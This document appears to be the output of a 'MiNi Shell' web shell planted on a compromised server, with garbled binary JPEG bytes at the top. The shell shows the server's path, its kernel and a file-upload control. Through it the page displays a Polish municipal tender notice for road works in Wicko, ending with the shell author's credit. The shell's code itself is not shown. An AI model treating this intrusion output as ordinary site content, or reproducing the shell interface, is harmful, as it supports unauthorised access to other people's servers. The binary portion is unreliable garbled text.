JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250625/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250625/0029360801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa ul. Nadbrzeżnej w Wicku polegająca na przebudowie progów zwalniających i montażu wyświetlaczy<br/>prędkości” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIĘDZYZDROJE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811685591</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Międzyzdroje</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@miedzyzdroje.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.miedzyzdroje.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa ul. Nadbrzeżnej w Wicku polegająca na przebudowie progów zwalniających i montażu wyświetlaczy<br/>prędkości” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-99f0b6bc-512e-4d0d-a592-91d1ed41dcf7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00293608</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>dot. korespondencji elektronicznej szczegółowo opisane są w pkt. 14 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.ZP.271.17.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac budowlanych polegających na przebudowie progów zwalniających<br/>zlokalizowanych przy działkach nr 53 i 57/2 Obręb Wicko (montaż prefabrykowanych najazdów sinusoidalnych oraz<br/>wykonanie nowej nawierzchni z betonu asfaltowego), wymianie i wyrównaniu nawierzchni na istniejącym progu<br/>zwalniającym przy Muzeum Bunkier V3, likwidacja progu zwalniającego zlokalizowanego przy działce nr 22/1 obr. Wicko<br/>oraz wykonanie wyspy zmieniającej tor jazdy.<br/>Projektowane zagospodarowanie terenu.<br/>1) Parametry techniczne:<br/>a) Klasa drogi – lokalna.<br/>b) Kategoria drogi – gminna.<br/>c) Położenie – na terenie zabudowanym.<br/>d) Prędkość – 50/30 km/h.<br/>e) Szerokość jezdni – 6,00m.<br/>f) Spadek poprzeczny jezdni – daszkowe 2,0%.<br/>g) Szerokość chodnika – 1,50-2,50m.<br/>h) Szerokość wyspy – 2,00m.<br/>i) Szerokość opaski – 50cm.<br/>2) Rodzaje nawierzchni:<br/>a) Jezdnia – nawierzchnia z betonu asfaltowego(warstwa ścieralna)<br/>b) Jezdnia – nawierzchnia z betonu asfaltowego (nowa konstrukcja i poszerzenie)<br/>c) Jezdnia- nawierzchnia z betonu asfaltowego (na wyniesieniach).<br/>d) Wyspa, opaska, zjazd – nawierzchnia z kostki brukowej.<br/>e) Jezdnia – prefabrykowany próg najazdowy sinusoidalny.<br/>f) Chodnik, ciąg pieszo-rowerowy - nawierzchnia z kostki brukowej betonowej.<br/>3) Odwodnienie<br/>Odwodnienie projektowanej inwestycji odbywać się będzie powierzchniowo, poprzez spadki poprzeczne i podłużne na teren<br/>zielony w granicach pasa drogowego. Dodatkowo w ramach zadania przewiduje się przestawienie i regulacje wysokościową<br/>istniejących wpustów deszczowych.<br/>W ramach zadania planuje się przebudowę ciągu pieszo-rowerowego.<br/>Ponadto w ramach zadania został zaprojektowany zjazd z ul. Nadbrzeżnej na wysokości skrzyżowania z ul. Pogodną. Zjazd<br/>będzie po wybudowaniu posiadać szerokość 4.0 m i zostanie wykonany z kostki betonowej koloru czerwonego oraz<br/>opornikiem drogowym.Dodatkowo w ramach inwestycji zostaną ustawione radarowe wyświetlacze prędkości zasilane panelem solarnym i turbiną<br/>wiatrową. Ostateczny kształt wyświetlacza prędkości należy uzgodnić z zamawiającym na etapie realizacji zadania.<br/>Po stronie Wykonawcy leży obowiązek sporządzenia projektu czasowej organizacji ruchu (TOR) dla potrzeb realizacji<br/>inwestycji, uzyskania wymaganych uzgodnień. Wykonawca jest zobowiązany do dnia rozpoczęcia robót, tj. do dnia<br/>01.09.2025 r., uzyskać zatwierdzenie projektu tymczasowej organizacji ruchu przez właściwy organ zarządzający ruchem, a<br/>następnie wprowadzenia zatwierdzonej organizacji ruchu na czas prowadzenia robót.. Wykonawca zobowiązany jest<br/>również do prawidłowego oznakowania i zabezpieczenia miejsc prowadzenia robót w pasie drogowym, zgodnie z<br/>obowiązującymi przepisami prawa. Wszelkie koszty związane ze sporządzeniem, uzgodnieniem, zatwierdzeniem i<br/>wdrożeniem tymczasowej organizacji ruchu ponosi Wykonawca.<br/>Po stronie Wykonawcy leży powiadomienie dyspozytorów sieci: energetycznych, gazowych i innych jeżeli występują o<br/>planowanej dacie rozpoczęcia inwestycji, posiadających swoje uzbrojenie w granicach pasa drogowego.<br/>Szczegółowy opis przedmiotu zamówienie stanowi projekt techniczny, specyfikacja techniczna wykonania i odbioru robót i<br/>na tej podstawie należy wycenić ofertę. Przedmiot zamówienie obejmuje także wszystkie inne czynności, wyraźnie<br/>niewyspecyfikowane w opisie przedmiotu zamówienia, który z przyczyn technicznych, technologicznych lub<br/>organizacyjnych, są lub staną się niezbędne do wykonania robót opisanych w dokumentacji technicznej i specyfikacji<br/>technicznej wykonania i odbioru robót, w tym miedzy innymi koszty regulacji istniejących nawierzchni do poziomu<br/>projektowanej nawierzchni, dostosowanie do poziomu projektowanej nawierzchni zjazdów na posesjach przyległych,<br/>regulację elementów ogrodzeń, bram wjazdowych i furtek.<br/>Zwraca się uwagę, że przy wynagrodzeniu ryczałtowym przedmiar robót nie jest podstawą do określenia zakresu robót<br/>budowlanych objętych przedmiotem zamówienia. Zawarte w przedmiarze pozycje mają być jedynie pomocą w kalkulacji<br/>kosztów inwestycji wobec tego jest to jedynie dokumentem wspomagającym wycenę przedsięwzięcia i stanowił<br/>uszczegółowianie wynagrodzenie ryczałtowego Wykonawcy określonego w Ofercie.<br/>W razie różnicy w treści dokumentów przyjmuje się, że Wykonawca uwzględnił w cenie oferty wszystkie posiadane<br/>informacje o Przedmiocie umowy, a w razie sprzeczności pomiędzy dokumentami, co do zakresu zamówienia przyjmuje się,<br/>że Wykonawca uwzględnił w cenie oferty najszerszy możliwy zakres wynikający z jakiegokolwiek udostępnionego<br/>dokumentu, w tym odpowiedzi na pytania i zmiany treści wskazanych wyżej dokumentów<br/>Materiały uzyskane z rozbiórki konstrukcji lub części robót za wyjątkiem odpadów powstałych w trakcie wykonania robót,<br/>stanowią własność Zamawiającego i Wykonawca winien przedsięwziąć wszelkie środki ostrożności niezbędne dla ich<br/>zachowania.<br/>a) W przypadku gdy w opisie przedmiotu zamówienia zostały wskazane znaki towarowe patenty lub pochodzenie, źródło lub<br/>szczególny proces który charakteryzuje produkty lub usługi dostarczane prze konkretnego wykonawcę, wskazaniu takiemu<br/>towarzyszą wyrazy „lub równoważny”. Jeżeli w dokumentacji projektowej wskazano produkty gotowe, z podaniem nazwy,<br/>symbolu i producenta, to produkty tę stanowią przykłady materiałów, elementów i urządzeń, jakie mogą być użyte przez<br/>Wykonawcę ramach robót. Znaki firmowe producentów oraz nazwy i symbole poszczególnych produktów zostały w<br/>dokumentacji podane jedynie w celu jak najdokładniejszego określenia ich charakterystyki Zamawiający, dopuszcza<br/>zastosowanie rozwiązań równoważnych, nie odbiegających od zaproponowanych w zakresie:<br/>- gabarytów i konstrukcji (wielkość z tolerancją ± 5%, rodzaj oraz liczba elementów składowych) - uwaga niniejsza nie<br/>dotyczy parametrów użytkowych i wymiarów obiektów budowlanych,<br/>- charakteru użytkowego (tożsamość funkcji),<br/>- charakterystyki materiałowej (rodzaj i jakość materiału),<br/>- wyglądu (struktura, barwa, kształt),<br/>- parametrów technicznych (wytrzymałość, trwałość, dane techniczne, konstrukcja, charakterystyki liniowe itp.) –<br/>minimalnych określonych w specyfikacji technicznej i projekcie budowlano-wykonawczym,<br/>- parametrów bezpieczeństwa użytkowania – minimalnych określonych odrębnymi przepisami.<br/>Zamawiający zwraca uwagę, że w przypadku składania przez Wykonawcę propozycji rozwiązań równoważnych, to na<br/>Wykonawcy ciąży wykazanie dowodu, iż oferowane dostawy, usługi lub roboty budowlane są zgodne z wymaganiami<br/>Zamawiającego. Jeżeli zastosowanie rozwiązania równoważnego wymaga dopełnienia strony formalnej, np. uzyskania<br/>akceptacji Nadzoru Autorskiego, zmiany Pozwolenia na budowę/zgłoszenia robót budowlanych niewymagających<br/>pozwolenia na budowę, wykonania projektów zamiennych, rysunków, itp. przez osoby uprawnione do wykonywania<br/>samodzielnej funkcji technicznej projektanta w odpowiedniej specjalności; Wykonawca ma obowiązek czynności te dopełnić<br/>na własny koszt w ramach wynagrodzenia umownego.<br/>Zgodnie z art. 101 ust. 4 ustawy Pzp Zamawiający dopuszcza rozwiązania równoważne opisanym za pomocą norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust.1 pkt 2 oraz ust.<br/>3 ustawy Pzp.<br/>Obowiązkiem Wykonawcy jest przekazanie Zamawiającemu, nie później niż do 5 dni po zawarciu umowy, harmonogramu<br/>rzeczowo – finansowego Przedmiotu umowy (zwanego dalej „Harmonogramem”), sporządzonego w formie papierowej i<br/>elektronicznej (plik excel) na adres um_annalewandowka@miedzyzdroje.pl. Harmonogram obejmować ma terminy<br/>rozpoczęcia i zakończenia poszczególnych elementów robót, wszystkie koszty i opłaty związane z realizacją Przedmiotu<br/>umowy, wszelkie materiały, urządzenia i wyposażenie oraz roboty niezbędne do wykonania Przedmiotu umowy zgodnie z<br/>opisem przedmiotu w specyfikacji warunków zamówienia. Harmonogram ma określać termin wykonania i koszt<br/>realizowanego Przedmiotu umowy w ramach umowy zawartej z Wykonawcą. Harmonogram akceptuje Zamawiający </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">34996000-5 - Drogowe urządzenia kontrolne, bezpieczeństwa lub sygnalizacyjne</p> <p class="mb-0">45233150-5 - Roboty w zakresie regulacji ruchu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2025-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolności do występowania w obrocie gospodarczym przepisów (o ile dotyczy):<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, które spełniają warunki, dotyczące posiadania<br/>zdolności do występowania w obrocie gospodarczym. Ocena spełniania warunków udziału w postępowaniu będzie<br/>dokonana na zasadzie spełnia/nie spełnia. Zamawiający nie konkretyzuje tego warunku, ocena spełnienia tego warunku<br/>zostanie dokonana na podstawie złożonego wraz z ofertą oświadczenie o spełnieniu przez Wykonawcę warunków udziału w<br/>postępowaniu.<br/>2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów (o<br/>ile dotyczy):<br/>Zamawiający nie konkretyzuje tego warunku, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego<br/>wraz z ofertą oświadczenia o spełnieniu przez Wykonawcę warunków udziału w postępowaniu.<br/>3. Sytuacji ekonomicznej lub finansowej (o ile dotyczy):<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy którzy spełniają warunki, dotyczące sytuacji<br/>ekonomicznej lub finansowej. Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna<br/>posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej<br/>na kwotę min 400 000, 00 zł (słownie: czterysta tysięcy złotych 00/100) wraz z potwierdzeniem opłacenie składki Polisy OC.<br/>4. Zdolności technicznej lub zawodowej (o ile dotyczy):<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy którzy spełniają warunki, dotyczące zdolności<br/>technicznej lub zawodowej. Za spełnienie warunku dotyczącego zdolności technicznej lub zawodowe Zamawiający uzna, że<br/>Wykonawca posiada wymagane zdolności technicznie/lub zawodowe zapewniające należyte wykonanie zamówienia, jeżeli<br/>Wykonawca wykaże, że:<br/>a) wykonał należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym minimum dwie roboty budowlane w zakresie budowy, przebudowy dróg lub ulic klasy min. L<br/>o wartości brutto równej lub wyższej od 300 000 PLN każda. Realizacja każdej z robót budowlanych powinna być<br/>potwierdzona załączonymi dokumentami, potwierdzającymi, że roboty zostały wykonane należycie oraz prawidłowo<br/>ukończone.b) Wykonawca musi wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, legitymujące się kwalifikacjami<br/>zawodowymi i doświadczeniem odpowiednim do funkcji, jaka zostanie im powierzona, tj.;<br/>• Kierownika Budowy: osoba posiadająca co najmniej niezbędne uprawnienia budowlane do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności drogowej oraz doświadczenie zawodowe przy realizacji co najmniej 2 zadania<br/>polegającego na budowie lub przebudowie lub remoncie drogi lub ulicy klasy min. L, na stanowisku Kierownika Budowy, a<br/>okres pełnienia ww. funkcji obejmował całość realizacji zadania tj. od przekazania placu budowy do odbioru końcowego<br/>inwestycji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy stanowi załącznik do SWZ. Zamawiający dopuszcza możliwość zmian umowy .Szczegółowy opis w § 16<br/>(ZMIANA UMOWY) we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-14 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem platformy https://e-propublico.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-14 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena oraz Gwarancja

Creat By MiNi SheLL
Email: jattceo@gmail.com